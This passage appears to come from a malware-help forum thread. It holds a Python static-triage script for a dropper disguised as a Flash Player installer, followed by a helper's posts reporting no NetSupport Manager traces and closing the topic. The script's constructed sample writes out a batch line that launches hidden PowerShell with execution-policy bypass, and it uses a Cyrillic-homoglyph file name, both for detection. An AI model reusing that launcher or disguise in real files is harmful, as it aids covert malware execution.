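    """Return (char, script) for non-Latin letters in a name that also has ASCII letters."""
    has_ascii = any(ch.isascii() and ch.isalpha() for ch in name)
    foreign = []
    for ch in name:
        if ch.isalpha() and not ch.isascii():
            script = unicodedata.name(ch, "UNKNOWN").split(" ")[0]
            if script != "LATIN":
                foreign.append((ch, script))
    return foreign if has_ascii else []


def triage_dropper(name, data):
    """Static triage of a downloaded file: nothing is written to disk or executed."""
    report = {
        "homoglyphs": mixed_script_chars(name),
        "pe_header": data[:2] == b"MZ",
        "embedded_zip": False,
        "script_members": [],
        "launcher_flags": {},
    }
    buf = io.BytesIO(data)
    # zipfile locates the end-of-central-directory record, so an archive
    # appended to an executable stub is still recognised.
    if zipfile.is_zipfile(buf):
        report["embedded_zip"] = True
        with zipfile.ZipFile(buf) as zf:
            for info in zf.infolist():
                if not info.filename.lower().endswith(SCRIPT_EXTS):
                    continue
                report["script_members"].append(info.filename)
                if info.file_size > MAX_MEMBER_BYTES:
                    continue
                text = zf.read(info).decode("utf-8", "replace").lower()
                hits = [flag for flag in RISKY_FLAGS if flag in text]
                if hits:
                    report["launcher_flags"][info.filename] = hits
        report["script_members"].sort()
    report["suspicious"] = bool(
        report["homoglyphs"] or (report["pe_header"] and report["script_members"])
    )
    return report


def build_sample():
    """Constructed sample: a dummy 'MZ' stub followed by a zip of inert text files."""
    zbuf = io.BytesIO()
    with zipfile.ZipFile(zbuf, "w") as zf:
        zf.writestr(
            "dvstrb.bat",
            "start powershell.exe -windowstyle hidden "
            "-executionpolicy bypass -file devmdn.ps1\r\n",
        )
        zf.writestr("devmdn.ps1", "# inert placeholder, not the real script\r\n")
    return b"MZ" + b"\x00" * 62 + zbuf.getvalue()


if __name__ == "__main__":
    # Constructed name: Cyrillic U+0430 stands in for Latin 'a' twice.
    sample_name = "install_fl\u0430sh_pl\u0430yer_for_windows_4_1_9_0172.exe"
    for key, value in triage_dropper(sample_name, build_sample()).items():
        print(f"{key}: {value}")
```
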


#6 Aura


Posted 21 October 2016 - 07:19 AM

Thank you, I got the file and submitted it to Malwarebytes and Emsisoft :) Looks like there are no traces of NetSupport Manager on your system, so the script didn't have time to do anything.

Was that all? Did you need help with anything else, malware-related?



#7 Aura


Posted 24 October 2016 - 07:19 AM

Hi zengotten,

Are you still with me? Do you need assistance with another malware-related issue, or is that all?



#8 Aura


Posted 26 October 2016 - 07:24 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.





